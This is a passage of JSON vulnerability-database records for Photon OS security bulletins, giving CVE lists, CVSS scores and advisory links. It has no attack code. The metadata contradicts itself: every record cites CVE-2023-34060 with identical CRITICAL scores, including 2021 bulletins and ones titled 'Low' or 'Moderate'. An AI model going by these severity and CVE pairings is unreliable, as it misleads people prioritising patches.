"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-02-04T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-0437", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872", "CVE-2022-23990", "CVE-2023-34060"], "modified": "2022-02-04T00:00:00", "id": "PHSA-2022-0437", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-437", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:27:19", "description": "Updates of ['sssd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-15T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2023-5.0-0143", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060"], "modified": "2023-11-15T00:00:00", "id": "PHSA-2023-5.0-0143", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-143", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:55:24", "description": "Updates of ['sssd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-15T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2023-3.0-0687", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060"], "modified": "2023-11-15T00:00:00", "id": "PHSA-2023-3.0-0687", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-687", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:34:18", "description": "Updates of ['sssd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-15T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2023-4.0-0512", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060"], "modified": "2023-11-15T00:00:00", "id": "PHSA-2023-4.0-0512", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-512", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:58:16", "description": "Updates of ['redis'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-07-14T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-3.0-0613", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24834", "CVE-2023-34060"], "modified": "2023-07-14T00:00:00", "id": "PHSA-2023-3.0-0613", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-613", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:33:48", "description": "Updates of ['wireshark'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-25T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-4.0-0521", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060", "CVE-2023-6175"], "modified": "2023-11-25T00:00:00", "id": "PHSA-2023-4.0-0521", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-521", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:59:33", "description": "Updates of ['shadow'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-05-30T00:00:00", "type": "photon", "title": "Low Photon OS Security Update - PHSA-2023-3.0-0588", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-29383", "CVE-2023-34060"], "modified": "2023-05-30T00:00:00", "id": "PHSA-2023-3.0-0588", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-588", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:45:11", "description": "Updates of ['zstd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-22T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2022-4.0-0235", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24032", "CVE-2023-34060"], "modified": "2022-08-22T00:00:00", "id": "PHSA-2022-4.0-0235", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-235", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:46:05", "description": "Updates of ['git'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-02T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-4.0-0220", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29187", "CVE-2023-34060"], "modified": "2022-08-02T00:00:00", "id": "PHSA-2022-4.0-0220", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-220", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:46:16", "description": "Updates of ['gnupg'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-07-29T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2022-4.0-0218", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-34903", "CVE-2023-34060"], "modified": "2022-07-29T00:00:00", "id": "PHSA-2022-4.0-0218", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-218", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:54:13", "description": "Updates of ['rust'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-05-06T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0019", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-36323", "CVE-2023-34060"], "modified": "2021-05-06T00:00:00", "id": "PHSA-2021-4.0-0019", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:54:05", "description": "Updates of ['gnuplot'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-4.0-0022", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25412", "CVE-2023-34060"], "modified": "2021-05-11T00:00:00", "id": "PHSA-2021-4.0-0022", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-22", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:40:28", "description": "Updates of ['strongswan'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-30T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2023-4.0-0366", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26463", "CVE-2023-34060"], "modified": "2023-03-30T00:00:00", "id": "PHSA-2023-4.0-0366", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-366", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:42:38", "description": "Updates of ['grub2'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-01-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-4.0-0306", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28733", "CVE-2023-34060"], "modified": "2023-01-03T00:00:00", "id": "PHSA-2023-4.0-0306", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-306", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:05:16", "description": "Updates of ['open-vm-tools'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-24T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-3.0-0442", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31676", "CVE-2023-34060"], "modified": "2022-08-24T00:00:00", "id": "PHSA-2022-3.0-0442", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-442", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:05:10", "description": "Updates of ['zlib'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-3.0-0436", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37434", "CVE-2023-34060"], "modified": "2022-08-17T00:00:00", "id": "PHSA-2022-3.0-0436", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-436", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:02:28", "description": "Updates of ['grub2'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-01-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-3.0-0510", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28733", "CVE-2023-34060"], "modified": "2023-01-03T00:00:00", "id": "PHSA-2023-3.0-0510", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:31:05", "description": "Updates of ['gdb'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-07-15T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-5.0-0050", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-25032", "CVE-2023-34060"], "modified": "2023-07-15T00:00:00", "id": "PHSA-2023-5.0-0050", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-50", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:37:36", "description": "Updates of ['openssl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-07-21T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-4.0-0434", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2975", "CVE-2023-34060"], "modified": "2023-07-21T00:00:00", "id": "PHSA-2023-4.0-0434", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-434", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:31:31", "description": "Updates of ['openssl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-07-23T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-5.0-0055", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2975", "CVE-2023-34060"], "modified": "2023-07-23T00:00:00", "id": "PHSA-2023-5.0-0055", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-55", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:32:26", "description": "Updates of ['curl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, 